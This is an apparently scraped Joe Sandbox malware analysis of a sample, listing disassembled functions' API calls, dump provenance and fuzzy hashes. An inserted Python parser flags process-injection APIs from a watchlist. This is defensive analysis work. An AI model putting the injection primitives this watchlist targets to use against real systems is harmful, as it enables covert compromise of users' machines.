• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1358664141-0
                                                                                                                                                                                                                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                                                                                                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2880819207-0
                                                                                                                                                                                                                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                                                                                                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                                                                                                                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 357397906-0
                                                                                                                                                                                                                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                                                                                                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00433950
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433974
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1187119602-0
                                                                                                                                                                                                                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                                                                                                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
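Every function block in this listing has the same fixed shape: an APIs list with call-site addresses (and indented "Part of subcall function" entries that belong to a callee), the memory-dump provenance, and the Similarity hashes. The parser below is an added example and not part of the Joe Sandbox report: it turns a text export of these blocks into records so an analyst can pivot on Opcode Fuzzy Hash across samples and scan the API sequences for the process-injection primitives named in the signature list at the top of the report. The SAMPLE text is copied from the MessageBoxW and __wsplitpath blocks above, with one fused "Download File" link artifact kept on purpose; the field layout is inferred from this page, and INJECTION_APIS is this example's own watchlist of real Win32/Nt API names, not something the report defines.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: two function blocks copied from the listing above, leading
# whitespace removed, one "Download File" link artifact deliberately left in place.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 00443CA6
• MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
• CloseHandle.KERNEL32(00000000), ref: 00443CF9
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
APIs
• __wsplitpath.LIBCMT ref: 0043392E
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• __wsplitpath.LIBCMT ref: 00433950
• __wcsicoll.LIBCMT ref: 00433974
• __wcsicoll.LIBCMT ref: 0043398A
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
• Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
"""

# One API entry after its bullet: "Name.MODULE(args), ref: 0040ABCD" or "Name.MODULE ref: 0040ABCD"
API_RE = re.compile(r"^(?P<name>[\w@?]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<func>[0-9A-Fa-f]{8}):\s+(?P<rest>.+)$")
KV_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")
SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
RESIDUE = "Download File"  # link text the HTML export fuses onto .sdmp file names

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                          # virtual address of the call site
    subcall_of: Optional[int] = None  # callee address when the call is inside a subcall

@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    image_base: Optional[int] = None
    associated: List[str] = field(default_factory=list)
    similarity: dict = field(default_factory=dict)

    def api_sequence(self) -> List[str]:
        """Direct calls in report order; subcall entries belong to other functions."""
        return [c.name for c in self.apis if c.subcall_of is None]

def _parse_api(text: str, subcall_of: Optional[int] = None) -> ApiCall:
    m = API_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised API entry: {text!r}")
    args = [a for a in (m["args"] or "").split(",") if a]
    return ApiCall(m["name"], m["module"], args, int(m["ref"], 16), subcall_of)

def parse_report(text: str) -> List[FunctionBlock]:
    blocks: List[FunctionBlock] = []
    block, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith(RESIDUE):
            line = line[: -len(RESIDUE)].rstrip()
        if line in SECTIONS:
            if line == "APIs":              # every function block opens with APIs
                block = FunctionBlock()
                blocks.append(block)
            section = line
            continue
        if block is None or not line.startswith("•"):
            continue                        # headings and page furniture
        entry = line[1:].strip()
        if section == "APIs":
            sub = SUBCALL_RE.match(entry)
            if sub:
                block.apis.append(_parse_api(sub["rest"], int(sub["func"], 16)))
            else:
                block.apis.append(_parse_api(entry))
            continue
        kv = KV_RE.match(entry)
        if not kv:
            continue
        key, value = kv["key"], kv["value"]
        if section == "Memory Dump Source" and key == "Source File":
            parts = [p.strip() for p in value.split(",")]  # file, "Offset: X", "based on PE: b"
            block.source_file = parts[0]
            for p in parts[1:]:
                if p.startswith("Offset:"):
                    block.image_base = int(p.split(":", 1)[1].strip(), 16)
        elif section == "Memory Dump Source" and key == "Associated":
            block.associated.append(value)
        elif section == "Similarity":
            block.similarity[key] = value
    return blocks

def group_by_opcode_hash(blocks: List[FunctionBlock]) -> dict:
    """Pivot for comparing functions across reports: equal hash, equal code shape."""
    groups: dict = {}
    for b in blocks:
        h = b.similarity.get("Opcode Fuzzy Hash")
        if h:
            groups.setdefault(h, []).append(b)
    return groups

# Example-specific watchlist (not from the report) for the injection behaviours the
# signature list names: foreign memory writes, APC queueing, thread-context changes,
# section mapping, remote thread creation.
INJECTION_APIS = frozenset({
    "WriteProcessMemory", "NtWriteVirtualMemory", "QueueUserAPC", "NtQueueApcThread",
    "SetThreadContext", "NtSetContextThread", "NtMapViewOfSection",
    "CreateRemoteThread", "NtCreateThreadEx",
})

def flag_injection(blocks: List[FunctionBlock]):
    """(call-site VA, API name) for every watchlisted call, direct or inside a subcall."""
    return [(c.ref, c.name) for b in blocks for c in b.apis if c.name in INJECTION_APIS]
```

Run `parse_report` over a saved text export of the whole disassembly section rather than this two-block sample; the two blocks here contain none of the watchlisted calls, so `flag_injection` returns an empty list for them, and the interesting hits will come from the process-injection functions the signature list refers to. `ref` values are virtual addresses inside the dumped image (`image_base` 0x400000 here), so subtract `image_base` to get an RVA for cross-referencing with the on-disk PE.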
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _wcslen$_malloc_wcscat_wcscpy
• String ID:
• API String ID: 1597257046-0
• Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
• Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
• Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
• Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
APIs
• GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
• __malloc_crt.LIBCMT ref: 0041F5B6
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: EnvironmentStrings$Free__malloc_crt
• String ID:
• API String ID: 237123855-0
• Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
• Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
• Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
• Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
APIs
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
• Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
• Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
• Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
• Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
• InterlockedExchange.KERNEL32(?,?), ref: 0044B603
• LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
• LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
• Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
• Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
• Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
• LineTo.GDI32(?,?,?), ref: 00447326
• EndPath.GDI32(?), ref: 00447336
• StrokePath.GDI32(?), ref: 00447344
Similarity
• API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
• String ID:
• API String ID: 2783949968-0
• Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
• Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
• Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
• Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
• GetCurrentThreadId.KERNEL32 ref: 004364A3
• AttachThreadInput.USER32(00000000), ref: 004364AA
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
• Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
• Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
• Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                                                                                                                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                                                                                                                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 146765662-0
                                                                                                                                                                                                                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                                                                                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
APIs
• GetDesktopWindow.USER32 ref: 00472B63
• GetDC.USER32(00000000), ref: 00472B6C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
• ReleaseDC.USER32(00000000,?), ref: 00472B99
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
• Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
• Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
• Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
• Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
APIs
• __getptd_noexit.LIBCMT ref: 00415150
  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
• CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
• __freeptd.LIBCMT ref: 0041516B
• ExitThread.KERNEL32 ref: 00415173
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
• String ID:
• API String ID: 1454798553-0
• Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
• Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
